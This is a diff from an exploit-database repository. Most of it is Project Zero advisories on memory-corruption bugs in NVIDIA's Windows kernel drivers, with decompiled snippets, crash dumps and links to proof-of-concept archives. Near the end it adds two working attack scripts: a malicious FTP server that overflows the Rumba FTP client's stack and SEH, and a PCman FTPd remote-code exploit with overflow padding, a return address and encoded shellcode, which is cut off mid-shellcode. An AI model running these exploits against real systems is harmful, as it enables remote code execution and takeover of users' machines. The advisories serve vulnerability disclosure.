r15=0000000000000001 +iopl=0 nv up ei pl nz ac po nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010216 +nvlddmkm+0x5dab00: +fffff800`5488ab00 f3410f7f03 movdqu xmmword ptr [r11],xmm0 ds:002b:41414141`41414141=???????????????????????????????? + +To reproduce, compile the PoC as a x64 binary (requires linking with +setupapi.lib, and WDK for D3DKMTEscape), and run. It may require some changes +as for it to work as the escape data must contain the right values (e.g. a +field that appears to be gpu bus device function). My PoC should hopefully set +all the right values for the machine it's running on. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40657.zip diff --git a/platforms/windows/dos/40658.txt b/platforms/windows/dos/40658.txt new file mode 100755 index 000000000..ba988f0e6 --- /dev/null +++ b/platforms/windows/dos/40658.txt @@ -0,0 +1,57 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=895 + +The DxgkDdiEscape handler for 0x7000194 doesn't do bounds checking with the +user provided lengths it receives. When these lengths are passed to memcpy, +overreads and memory corruption can occur. + +void __fastcall escape_7000194(NvMiniportDeviceContext *ctx, Escape7000194 *escape_data) + ... + + alloc_0_ = ExAllocatePoolWithTag_(PagedPool, escape->size_0, 0x7061564Eu); + + ... + + alloc_1 = ExAllocatePoolWithTag_(PagedPool, escape->size_1, 0x7061564Eu); + + .. + + if ( (_BYTE)v11 ) { + memcpy(alloc_0, escape->buf_0, escape->size_0); + memcpy(alloc_1, escape->buf_2, escape->size_1); + } + v8 = Escape7Handler(0i64, dword_7DCB84, *(_DWORD *)(v3 + 24), 0x402C0105, &escape->data, 96); + v9 = v8; + if ( !(_BYTE)v11 && !v8 ) + memcpy(escape->buf_0, alloc_0, escape->size_0); + + ... + +The PoC I've provided causes an OOB read, but it should be possible to pass an +input that results in the third memcpy being executed instead of the first two, +which leads to kernel memory corruption (OOB write). + +(Win 10 x64 372.54) crashing context with PoC: + +PAGE_FAULT_IN_NONPAGED_AREA (5) +... +Some register values may be zeroed or incorrect. +rax=0000000000000007 rbx=0000000000000000 rcx=ffffc000f5220f80 +rdx=fffffffff3d5509c rsi=0000000000000000 rdi=0000000000000000 +rip=fffff8007d4dad66 rsp=ffffd00166b9d2a8 rbp=ffffc000e8f55038 + r8=0000000000020fc0 r9=000000000006603e r10=0000000000020000 +r11=ffffc000f5200000 r12=0000000000000000 r13=0000000000000000 +r14=0000000000000000 r15=0000000000000000 +iopl=0 nv up ei pl nz na pe nc +nvlddmkm+0x5dad66: +fffff800`7d4dad66 f30f6f4c0ae0 movdqu xmm1,xmmword ptr [rdx+rcx-20h] ds:ffffc000`e8f75ffc=???????????????????????????????? +Resetting default scope + +To reproduce, compile the PoC as a x64 binary (requires linking with +setupapi.lib, and WDK for D3DKMTEscape), and run. It may require some changes +as for it to work as the escape data must contain the right values (e.g. a +field that appears to be gpu bus device function). My PoC should hopefully set +all the right values for the machine it's running on. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40658.zip diff --git a/platforms/windows/dos/40659.txt b/platforms/windows/dos/40659.txt new file mode 100755 index 000000000..fddbac413 --- /dev/null +++ b/platforms/windows/dos/40659.txt @@ -0,0 +1,30 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=911 + +The DxgkDdiEscape handler for 0x600000D passes an unchecked user provided +pointer as the destination for a memcpy call. This leads to kernel memory +corruption. + +(Win 10 x64 372.54) crashing context with PoC: + +SYSTEM_SERVICE_EXCEPTION (3b) +CONTEXT: ffffd000c076c8b0 -- (.cxr 0xffffd000c076c8b0) +rax=0000000000000880 rbx=0000000000000000 rcx=000000000000000f +rdx=bebe9ec057cc7d47 rsi=ffffd000c076d870 rdi=ffffe001990da008 +rip=fffff8010f1eab00 rsp=ffffd000c076d2d8 rbp=ffffd000c076d360 + r8=0000000000003ff1 r9=fffff8010f217d48 r10=fffff78000000008 +r11=4141414141414141 r12=0000000000000000 r13=ffffe001990dbe88 +r14=ffffe001945f1201 r15=0000000000004000 +iopl=0 nv up ei pl nz ac pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010212 +nvlddmkm+0x5dab00: +fffff801`0f1eab00 f3410f7f03 movdqu xmmword ptr [r11],xmm0 ds:002b:41414141`41414141=???????????????????????????????? +Resetting default scope + +To reproduce, compile the PoC as a x64 binary (requires WDK for D3DKMTEscape), +and run. + +For completeness, it looks like many of the other escape handlers in the same function has similar issues with writing to user provided pointers in an unchecked way. This should have been fairly obvious as the code is very close to each other in the same function. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40659.zip diff --git a/platforms/windows/dos/40661.txt b/platforms/windows/dos/40661.txt new file mode 100755 index 000000000..ac4010ebe --- /dev/null +++ b/platforms/windows/dos/40661.txt @@ -0,0 +1,48 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=927 + +The DxgkDdiEscape handler for escape code 0x100010b looks like: + +char escape_100010b(NvMiniportDeviceContext *miniport_context, HANDLE handle, unsigned int idx) +{ + PVOID *Object; + if ( !handle ) + do_debug_thingo(); + Object = (PVOID *)&miniport_context->UNKNOWN[8 * idx + 22696]; + if ( !ObReferenceObjectByHandle(handle_, SYNCHRONIZE, )ExEventObjectType, UserMode, Object, 0i64) ) + { + result = 0; + if ( *Object ) + result = UserMode; + } + return result; +} + +It essentially takes in a user mode event handle from userspace, and calls +ObReferenceObjectByHandle on it, writing the object pointer to |Object|. Note +that the kernel implementation of ObReferenceObjectByHandle always begins with +writing NULL to this pointer regardless of whether or not the handle is valid. + +|Object| is calculated using a user provided index that is not bounds checked, +leading to OOB write of either NULL or the KEVENT pointer: + +Object = (PVOID *)&miniport_context_->UNKNOWN[8 * idx + 22696]; + +The attached PoC causes the following crashing context on Win x64 372.54: + +PAGE_FAULT_IN_NONPAGED_AREA (50) +... +rax=ffffe0025ea28f50 rbx=0000000000000000 rcx=0000000000000000 +rdx=0000000000100000 rsi=0000000000000000 rdi=0000000000000000 +rip=fffff801d8f3daf5 rsp=ffffd000203deda0 rbp=0000000000000001 + r8=ffffe000506d4b50 r9=ffffe000524fb201 r10=0000000000000000 +r11=ffffd000203df370 r12=0000000000000000 r13=0000000000000000 +r14=0000000000000000 r15=0000000000000000 +iopl=0 nv up ei pl zr na po nc +nt!ObReferenceObjectByHandleWithTag+0x45: +fffff801`d8f3daf5 488908 mov qword ptr [rax],rcx ds:ffffe002`5ea28f50=???????????????? + +To reproduce, compile as a x64 executable and run (requires WDK for D3DKMTEscape). + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40661.zip diff --git a/platforms/windows/dos/40662.txt b/platforms/windows/dos/40662.txt new file mode 100755 index 000000000..be81661e2 --- /dev/null +++ b/platforms/windows/dos/40662.txt @@ -0,0 +1,41 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=936 + +The DxgkDdiEscape handler for 0x7000170 lacks proper bounds checks for the variable size +input escape data, and relies on a user provided size as the upper bound for writing output. + +Crashing context with PoC (Win 10 x64 with 372.54): + +KERNEL_SECURITY_CHECK_FAILURE (139) +A kernel component has corrupted a critical data structure. The corruption +could potentially allow a malicious user to gain control of this machine. +... + +rax=fffff801f417e600 rbx=0000000000000000 rcx=0000000000000002 +rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000 +rip=fffff801f4152b75 rsp=ffffd000287b4468 rbp=ffffd000287b53e8 + r8=fffff801f4169e24 r9=ffffd000287b5620 r10=ffffd000287b5620 +r11=0000000000000450 r12=0000000000000000 r13=0000000000000000 +r14=0000000000000000 r15=0000000000000000 +iopl=0 nv up ei ng nz ac pe nc +dxgkrnl!_report_gsfailure+0x5: +fffff801`f4152b75 cd29 int 29h +Resetting default scope + +EXCEPTION_RECORD: ffffd000287b4228 -- (.exr 0xffffd000287b4228) +ExceptionAddress: fffff801f4152b75 (dxgkrnl!_report_gsfailure+0x0000000000000005) + ExceptionCode: c0000409 (Security check failure or stack buffer overrun) + ExceptionFlags: 00000001 +NumberParameters: 1 + Parameter[0]: 0000000000000002 +Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE + +To reproduce, compile the PoC as a x64 binary (requires linking with +setupapi.lib, and WDK for D3DKMTEscape), and run. It may require some changes +as for it to work as the escape data must contain the right values (e.g. a +field that appears to be gpu bus device function). My PoC should hopefully set +all the right values for the machine it's running on. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40662.zip + diff --git a/platforms/windows/dos/40663.txt b/platforms/windows/dos/40663.txt new file mode 100755 index 000000000..51e27a71d --- /dev/null +++ b/platforms/windows/dos/40663.txt @@ -0,0 +1,42 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=937 + +The DxgkDdiEscape handler for 0x5000027 accepts a user provided pointer, +but does no checks on it before using it. + +... + DWORD* user_ptr = escape_5000027_data->user_ptr; + v32 = user_ptr[2]; + v33 = user_ptr + 3; + if ( v32 != -1 ) + v33 = (_DWORD *)v32; + sub_91C24(miniport_context_, *user_ptr, user_ptr[1], v33, (__int64)&escape_data_); +... + +The PoC I’ve provided causes a read on said pointer, but based on inspecting where this pointer +is passed it seems like there is at least 1 code path that can result in a write (I haven't +confirmed this though). + +(On Win 10 x64 with 372.54) + +FAULTING_IP: +nvlddmkm!nvDumpConfig+1338c7 +fffff801`8a26a79f 8b4808 mov ecx,dword ptr [rax+8] + +CONTEXT: ffffd00023649970 -- (.cxr 0xffffd00023649970) +rax=4141414141414141 rbx=ffffd0002364a870 rcx=0000000005000017 +rdx=ffffd0002364a498 rsi=0000000000000000 rdi=ffffd0002364a498 +rip=fffff8018a26a79f rsp=ffffd0002364a390 rbp=ffffd0002364a4a9 + r8=ffffd0002364a870 r9=ffffe8023c537220 r10=0000000000000000 +r11=ffffd0002364a370 r12=ffffe8023c537220 r13=fffff80189fa9370 +r14=ffffe000d6f2a000 r15=ffffe8023c537220 +iopl=0 nv up ei pl zr na po nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246 +nvlddmkm!nvDumpConfig+0x1338c7: +fffff801`8a26a79f 8b4808 mov ecx,dword ptr [rax+8] ds:002b:41414141`41414149=???????? +Resetting default scope + +To reproduce, compile PoC as a x64 executable and run (requires WDK for D3DKMTEscape). + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40663.zip diff --git a/platforms/windows/dos/40664.txt b/platforms/windows/dos/40664.txt new file mode 100755 index 000000000..cfe9672e2 --- /dev/null +++ b/platforms/windows/dos/40664.txt @@ -0,0 +1,48 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=940 + +The DxgkDdiEscape handler for 0x70001b2 doesn't do proper bounds checks for its +variable size input. + +void sub_8C4304(...) { + ... + // escape_->size is controlled by the user. + if ( escape_->size < size ) + size = escape_->size; + memcpy(escape_->data, v31, 28i64 * size); + ... +} + +Note that this appears to be a common pattern. Normally, before +escape handlers are executed, |PrivateDriverDataSize| (from DXGKARG_ESCAPE) +is checked to be equal to some value against a hardcoded table. However, some escapes +allow a more relaxed check that |PrivateDriverDataSize| >= minimum. This means that +the handler themselves must implement an ad hoc bounds check, which either seems to be +missing or implemented incorrectly (relying on a user specified value) in many cases. + +bug 936 is a similar issue and there are likely more. I've noticed (but not confirmed) +a few more OOB reads that I haven't reported that follow this same pattern. + +Crashing context with PoC (Win 10 x64 with 372.54): + +PAGE_FAULT_IN_NONPAGED_AREA (50) +Invalid system memory was referenced. This cannot be protected by try-except. +Typically the address is just plain bad or it is pointing at freed memory. +Arguments: +... +rax=ffffd000239d51dc rbx=0000000000000000 rcx=fffffffffffffff4 +rdx=fffff000e9e6c754 rsi=0000000000000000 rdi=0000000000000000 +rip=fffff80166d6aca0 rsp=ffffd000239d3df8 rbp=ffffd000239d3f00 + r8=0000000000000924 r9=000000000000003b r10=000000000000e9ef +r11=ffffd000239d48ac r12=0000000000000000 r13=0000000000000000 +r14=0000000000000000 r15=0000000000000000 +iopl=0 nv up ei ng nz ac pe cy +nvlddmkm+0x5daca0: +fffff801`66d6aca0 f30f7f40f0 movdqu xmmword ptr [rax-10h],xmm0 ds:ffffd000`239d51cc=???????????????????????????????? +Resetting default scope + +To reproduce, compile as an x64 executable an run (requires WDK for D3DKMTEscape). + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40664.zip + diff --git a/platforms/windows/dos/40665.txt b/platforms/windows/dos/40665.txt new file mode 100755 index 000000000..f226290bd --- /dev/null +++ b/platforms/windows/dos/40665.txt @@ -0,0 +1,60 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=942 + +The DxgkDdiEscape handler for escape 0x100009a lacks proper bounds checks: + +case 0x100009A: + ... + size_0 = escape_data->size_1; + ... + size_1 = 2 - (escape_data->unknown < 18); + ... + size_2 = escape_data->size_2; + ... + total_size = size_0 * size_1 * size_2; + ... + + if (total_size > 0x10) + do_debug_thingo(); + + if (total_size) { + DWORD* ptr = alloced_buf + 24; + DWORD* user_buf = escape_data->data; + ... + while (total_size) { + *(ptr - 1) = *(user_buf - 1); + *ptr = *user_buf; + ... + user_buf += 4; + ptr += 39; + --total_size; + } + +There is a check that total_size > 0x10, which calls some kind of a +debug/logging function (do_debug_thingo in my pseudocode), but it does not +actually stop processing of the escape. This leads to buffer overflow on the +allocated pool buffer later on. + +Note that there is also a potential integer overflow in the calculation of +|total_size|. Since the individual sizes (size_0, size_1, size_2) appear to be +stored in a struct and eventually passed off to another function, there may be +more problems later on too. + +Crashing context with PoC (Win10 x64 with 372.54): + +PAGE_FAULT_IN_NONPAGED_AREA (50) +Invalid system memory was referenced. This cannot be protected by try-except. +Typically the address is just plain bad or it is pointing at freed memory. +... +rax=00000000caa6ed30 rbx=0000000000000000 rcx=ffffc001cd337044 +rdx=00000000000f41bd rsi=0000000000000000 rdi=0000000000000000 +rip=fffff80102461188 rsp=ffffd000243bbed0 rbp=ffffd000243bbfd0 + r8=0000000000000000 r9=0000000000000000 r10=0000000000000000 +r11=0000000000000000 r12=0000000000000000 r13=0000000000000000 +r14=0000000000000000 r15=0000000000000000 +iopl=0 nv up ei pl nz na po nc +nvlddmkm!nvDumpConfig+0x12a2b0: +fffff801`02461188 8941fc mov dword ptr [rcx-4],eax ds:ffffc001`cd337040=???????? + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40665.zip diff --git a/platforms/windows/dos/40666.txt b/platforms/windows/dos/40666.txt new file mode 100755 index 000000000..42946bfa3 --- /dev/null +++ b/platforms/windows/dos/40666.txt @@ -0,0 +1,56 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=944 + +The DxgkDdiEscape handler for 0x70000d5 lacks bounds checks: + + ... + + if ( g_saved_size ) + { + escape->size = g_saved_size; + if ( (unsigned int)g_saved_size > 0 ) + { + do + { + v5 = v2++; + escape->data[v5] = global_array[v5 + 77]; + } + while ( v2 < g_saved_size ); + } + return; + } + data = 0i64; + + + ... + if ( escape->size > 0 ) + { + do + { + ii = i++; + global_array[ii + 77] = escape->data[ii]; + } + while ( i < escape->size ); + + ... + g_saved_size = escape->size; + +This handler copies data to/from a global array, but lacks any form of bounds checking, as +|escape->size| is controlled by the user. This leads to overflow of the global buffer, and pool overflows +when it's copied back into the escape data. + +A PoC is attached that should cause a crash (Win 10 x64, 372.54): + +KERNEL_SECURITY_CHECK_FAILURE (139) +A kernel component has corrupted a critical data structure. The corruption +could potentially allow a malicious user to gain control of this machine. +Arguments: +Arg1: 0000000000000002, Stack cookie instrumentation code detected a stack-based + buffer overrun. +Arg2: ffffd00022de52c0, Address of the trap frame for the exception that caused the bugcheck +Arg3: ffffd00022de5218, Address of the exception record for the exception that caused the bugcheck +Arg4: 0000000000000000, Reserved + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40666.zip + diff --git a/platforms/windows/dos/40667.txt b/platforms/windows/dos/40667.txt new file mode 100755 index 000000000..8dd65ea0c --- /dev/null +++ b/platforms/windows/dos/40667.txt @@ -0,0 +1,31 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=946 + +There is a missing bounds check in inner loop of the escape handler for 0x7000014 +that leads to a stack buffer overflow: + +... +for (DWORD i = 0; < escape->num_data; ++i) { + ... + // size is user controlled. + size = escape->data[i].size; + for (DWORD j = 0; j < size; ++j) { + stack_buf[j] = escape->data[...]; + } +} + +The attached PoC gives me the following crashing context (Win 10 x64, 372.54): + +DRIVER_OVERRAN_STACK_BUFFER (f7) +A driver has overrun a stack-based buffer. This overrun could potentially +allow a malicious user to gain control of this machine. +... +ffffd000`23f94a78 fffff801`6e5deaf2 : ffffd000`23f95270 00000000`000000f7 ffffd000`23f94be0 fffff801`6e43c848 : nt!DbgBreakPointWithStatus +ffffd000`23f94a80 fffff801`6e5de4c3 : 00000000`00000003 ffffd000`23f94be0 fffff801`6e56c600 00000000`000000f7 : nt!KiBugCheckDebugBreak+0x12 +ffffd000`23f94ae0 fffff801`6e55fa44 : 00000000`00000000 00000000`00000000 ffffc001`c8e7202c fffff801`6e7188b8 : nt!KeBugCheck2+0x893 +ffffd000`23f951f0 fffff800`c58e2bc6 : 00000000`000000f7 ffffd000`23f95270 000044dd`b2c37fec ffffbb22`4d3c8013 : nt!KeBugCheckEx+0x104 +ffffd000`23f95230 fffff800`c57ba4ce : ffffd000`23f95220 ffffe000`69a62000 00000000`00000001 00000000`07000014 : nvlddmkm+0x192bc6 +ffffd000`23f95270 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvlddmkm+0x6a4ce + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40667.zip diff --git a/platforms/windows/dos/40668.txt b/platforms/windows/dos/40668.txt new file mode 100755 index 000000000..d02975642 --- /dev/null +++ b/platforms/windows/dos/40668.txt @@ -0,0 +1,54 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=947 + +The escape handler for 0x10000e9 lacks bounds checks, and passes a user +specified size as the size to memcpy, resulting in a stack buffer overflow: + +bool escape_10000e9(NvMiniportDeviceContext *a1, Escape10000e9 *escape) { + ... + LOBYTE(a9) = escape_->unknown_5[1] != 0; + LOBYTE(a8) = escape_->unknown_5[0] != 0; + if ( !sub_DC57C( + *(_QWORD *)(*(_QWORD *)(v4 + 104) + 1000i64), + escape_->unknown_1, + escape_->unknown_2, + escape_->unknown_3, + escape_->unknown_4, + escape_->data, + escape_->size, + a8, + a9, + &escape_->unknown_5[2]) ) + return 0; + escape_->header.result = 1; + return 1; +} + +char sub_DC57C(...) { + ... + // escape_buf is escape_->data from previous function + // buf_size is escape->size + memcpy(&stack_buf, escape_buf, (unsigned int)buf_size); + ... + +Crashing context (Win 10 x64, 372.54): + +DRIVER_OVERRAN_STACK_BUFFER (f7) +A driver has overrun a stack-based buffer. This overrun could potentially +allow a malicious user to gain control of this machine. +... + +STACK_TEXT: +ffffd000`263bc188 fffff803`9d1deaf2 : 9d919d43`2d3cc8a7 00000000`000000f7 ffffd000`263bc2f0 fffff803`9d03c848 : nt!DbgBreakPointWithStatus +ffffd000`263bc190 fffff803`9d1de4c3 : 00000000`00000003 ffffd000`263bc2f0 fffff803`9d16c600 00000000`000000f7 : nt!KiBugCheckDebugBreak+0x12 +ffffd000`263bc1f0 fffff803`9d15fa44 : 00000000`00000000 00000000`00000000 00000000`00000000 ffffc000`494d4764 : nt!KeBugCheck2+0x893 +ffffd000`263bc900 fffff800`ad8c2bc6 : 00000000`000000f7 9d919d43`2d3cc8a7 0000f6ec`74dc94fc ffff0913`8b236b03 : nt!KeBugCheckEx+0x104 +ffffd000`263bc940 fffff800`ad7fc6f7 : c0004492`55400400 ffff8000`00000000 ffffc000`44925540 00000000`00000000 : nvlddmkm+0x192bc6 +ffffd000`263bc980 ffffc000`585e78a0 : 00000000`000005d4 00430043`00310030 4666744e`03610107 00000000`00000000 : nvlddmkm+0xcc6f7 +ffffd000`263bce70 00000000`000005d4 : 00430043`00310030 4666744e`03610107 00000000`00000000 00000c48`01380702 : 0xffffc000`585e78a0 +ffffd000`263bce78 00430043`00310030 : 4666744e`03610107 00000000`00000000 00000c48`01380702 00010000`000166c2 : 0x5d4 +ffffd000`263bce80 4666744e`03610107 : 00000000`00000000 00000c48`01380702 00010000`000166c2 00000000`00000000 : 0x00430043`00310030 +ffffd000`263bce88 00000000`00000000 : 00000c48`01380702 00010000`000166c2 00000000`00000000 00000000`00000000 : 0x4666744e`03610107 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40668.zip diff --git a/platforms/windows/local/40585.txt b/platforms/windows/local/40585.txt index 89ae35af9..d262c0c27 100755 --- a/platforms/windows/local/40585.txt +++ b/platforms/windows/local/40585.txt @@ -53,3 +53,19 @@ EXAMPLE: Using the BINARY_PATH_NAME listed above as an example, an executable named "Program.exe" could be placed in "C:\", and it would be executed as the Local System user next time the service was restarted. + + +############################################################ + +From Lenovo PSIRT: + +This issue was fixed in version 3.0.44.0, which was released on June 4, 2013. README for Lenovo Communications Utility program: + +https://download.lenovo.com/pccbbs/mobiles/grcu19ww.txt + +3.0.44.0 01 2013/06/04 +<3.0.44.0> +- (Fix) Fixed the vulnerability issue of service program registration. +- (Fix) Fixed the issue that vcamsvc.exe might crash. +- (Fix) Fixed the issue that TpKnrres.exe might crash. +- (Fix) Fixed the issue that TPKNRSVC.exe might crash. diff --git a/platforms/windows/local/40655.txt b/platforms/windows/local/40655.txt new file mode 100755 index 000000000..793ac7bff --- /dev/null +++ b/platforms/windows/local/40655.txt @@ -0,0 +1,14 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=880 + +The \\.\UVMLiteController device is created by the nvlddmkm.sys driver, and can be opened by any user. The driver handles various control codes for this device, but there is no validation for the input/output buffer and their sizes. + +In addition to potential overreads on the input, the driver writes output directly to Irp->UserBuffer, which is the output pointer passed to DeviceIoControl() by the user. The IO control codes handled specify METHOD_BUFFERED, but the kernel does no validation that the output pointer is accessible by the user process if the user passes an output buffer size of 0. + +This means that a user mode program can cause a write of (at least) the 32-bit values 0 or 31, or the 8-bit value 0 to any address given to the driver. + +A PoC is attached that causes a bsod when the kernel tries to write to 0x4141414141414141+0x30. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40655.zip diff --git a/platforms/windows/local/40660.txt b/platforms/windows/local/40660.txt new file mode 100755 index 000000000..450f6d1d1 --- /dev/null +++ b/platforms/windows/local/40660.txt @@ -0,0 +1,79 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=918 + +The NvStreamKms.sys driver calls PsSetCreateProcessNotifyRoutineEx to set up a +process creation notification routine. + +In this particular routine, + +if ( cur->image_names_count > 0 ) { + // info_ is the PPS_CREATE_NOTIFY_INFO that is passed to the routine. + image_filename = info_->ImageFileName; + buf = image_filename->Buffer; + if ( buf ) + { + if ( !v5 ) + { + i = 0i64; + num_chars = image_filename->Length / 2; + // Look for the filename by scanning for backslash. + if ( num_chars ) + { + while ( buf[num_chars - (unsigned int)i - 1] != '\\' ) + { + i = (unsigned int)(i + 1); + if ( (unsigned int)i >= num_chars ) + goto LABEL_39; + } + buf += num_chars - (unsigned __int64)(unsigned int)i; + } +LABEL_39: + v26 = (unsigned int)i; + wcscpy_s((wchar_t *)Dst, i, buf); + Dst[v26] = 0; + wcslwr((wchar_t *)Dst); + v5 = 1; + +wcscpy_s is used incorrectly here, as the second argument is not the size of +|Dst|, but rather the calculated size of the filename. |Dst| is a stack buffer +that is at least 255 characters long. The the maximum component paths of most +filesystems on Windows have a limit that is <= 255 though, so this shouldn't be +an issue on normal filesystems. + +However, one can pass UNC paths to CreateProcessW containing forward slashes as +the path delimiter, which means that the extracted filename here can be +"a/b/c/...", leading to a buffer overflow. Additionally, this function has no +stack cookie. + +e.g. + +CreateProcessW(L"\\\\?\\UNC\\127.0.0.1@8000\\DavWWWRoot\\..../..../..../blah.exe", ... + +Crashing context with my PoC (Win 10 x64 with 372.54): + +NvStreamKms+0x1c6a: +fffff801`5c791c6a c3 ret + +kd> dqs rsp +ffffd000`25bc5d18 00410041`00410041 + +kd> t + +... + +KMODE_EXCEPTION_NOT_HANDLED (1e) +... +FAULTING_IP: +NvStreamKms+1c6a +fffff800`5b1d1c6a c3 ret + +To reproduce, a WebDAV server is required (can be localhost), and the WebClient +service needs to be started (start can be triggered by user without additional privileges). + +Then, run setup to create the long path to the target executable (you'll need to +change the base directories), and then run poc_part1, and then poc_part2 (with +the right UNC path) on the target machine. + + +Proofs of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40660.zip + diff --git a/platforms/windows/remote/40651.py b/platforms/windows/remote/40651.py new file mode 100755 index 000000000..3220dc6ae --- /dev/null +++ b/platforms/windows/remote/40651.py @@ -0,0 +1,136 @@ +# Exploit Title: Rumba FTP 4.x Client Stackoverflow SEH +# Date: 29-10-2016 +# Exploit Author: Umit Aksu +# Vendor Homepage: http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28731.rumba-ftp-4-x-security-update.aspx +# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40307 +# Version: 4.x +# Tested on: Windows 7 +# CVE : CVE-2016-5764 + + + +1. Description + +Micro Focus Rumba FTP Client 4.x cannt handle long directory names. An attacker can setup a malicious FTP server that can send a long directory name which can led to remote code execution +on connected client. + +2. Proof of Concept + +The code below can be used to setup a malicious FTP server that will send a long directory name and overwrite the stack. The PoC only overwrites the SEH + NSEH. + + +3. PoC Code + + +------------------- Server.py -------------------------- + + +import socket +import sys +import time + +# IP Address +IP = '127.0.0.1' \ + '' +# Create a TCP/IP socket +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +# Bind the socket to the port +server_address = (IP,21) +print "Starting up on %s port %s" % server_address +sock.bind(server_address) + +# Listen for incoming connections +sock.listen(1) + +# Wait for incoming connection +while True: + print "Waiting for a connection" + connection, client_address = sock.accept() + + try: + print "Connection from " + str(client_address) + # Receive the data in small chunks and restransmit it + connection.send("220 Welcome\r\n") + + while(True): + data = connection.recv(16) + print "received %s" % data + if "USER" in data: + print "Sending 331" + connection.send("331 Please specify the password.\r\n") + if "PASS" in data: + print "Sending 227" + connection.send("230 Login successful.\n\n") + if "PWD" in data: + print "Sending 257" + + # 77A632E2 add esp,908 pop pop pop ret + # THIS IS THE PART WHERE THE OVERFLOW HAPPENS + connection.send("257 \"/"+"A"*629+"\x45\x45\x45\x45"+ "\x44\x44\x44\x44" + "D"*185 + "rrrr" + "D"*211 + "\"\r\n") + if "TYPE A" in data: + print "Sending 200 Switching to ASCII mode." + connection.send("200 Switching to ASCII mode.\r\n") + if "TYPE I" in data: + print "Sending 200 Switching to Binary mode." + connection.send("200 200 Switching to Binary mode.\r\n") + if "SYST" in data: + print "Sending 215" + connection.send("215 UNIX Type: L8\r\n") + + if "SIZE" in data: + print "Sending 200" + connection.send("200 Switching to Binary mode. \r\n") + + if "FEAT" in data: + print "Sending 211-Features" + connection.send("211-Features:\r\n EPRT\r\n EPSV\r\n MDTM\r\n PASV\r\n REST STREAM\r\n SIZE\r\n TVFS\r\n211 End\r\n") + if "CWD" in data: + print "Sending 250 Directory successfully changed." + connection.send("250 Directory successfully changed.\r\n") + + if "PASV" in str(data): + print "Sending 227 Entering Passive Mode (130,161,45,252,111,183)\n\n" + connection.send("227 Entering Passive Mode (130,161,45,252,111,183)\n\n") + + # Listen on new socket for connection + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + print 'Socket created' + + #Bind socket to local host and port + try: + s.bind((IP, 28599)) + except socket.error as msg: + print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1] + sys.exit() + + print 'Socket bind complete for PASV on port 28599' + + #Start listening on socket + s.listen(10) + print 'Socket now listening on 28599' + + #now keep talking with the client + + #wait to accept a connection - blocking call + conn, addr = s.accept() + print 'Connected with ' + addr[0] + ':' + str(addr[1]) + time.sleep(1) + print "Sending dir list" + connection.send("150 Here comes the directory listing.\r\n") + conn.send("d"*500+"rwx------ 2 500 500 4096 Nov 05 2007 " + "A." + "B"*500 + "\r\n") + + # Send ok to ftp client + connection.send("226 Directory send OK.\r\n") + + # close the connection + s.close() + conn.close() + break + + if "EXIT" in str(data): + print "REC" + connection.send("Have a nice day!\r\n") + break + finally: + connection.close() \ No newline at end of file diff --git a/platforms/windows/remote/40670.py b/platforms/windows/remote/40670.py new file mode 100755 index 000000000..60592f98c --- /dev/null +++ b/platforms/windows/remote/40670.py @@ -0,0 +1,45 @@ +from ftplib import FTP + +print ''' + ############################################## + # Created: ScrR1pTK1dd13 # + # Name: Greg Priest # + # Mail: ScrR1pTK1dd13.slammer@gmail.com # + ############################################## + +# Exploit Title: PCmanftpd_delete_command_remotecode_exploit_Win7_x64_HUN_ENG +# Date: 2016.10.31 +# Exploit Author: Greg Priest +# Version: Pcmanftpd 2.0.7 +# Tested on: Windows 7 Enterprise x64 HUN/ENG +''' +ftp_ip = raw_input("FTP server IP:") +overflow = 'A' * 2005 +eip = '\xCA\x96\xC9\x76' + '\x90' * 10 +shellcode=( +"\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" + +"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" + +"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" + 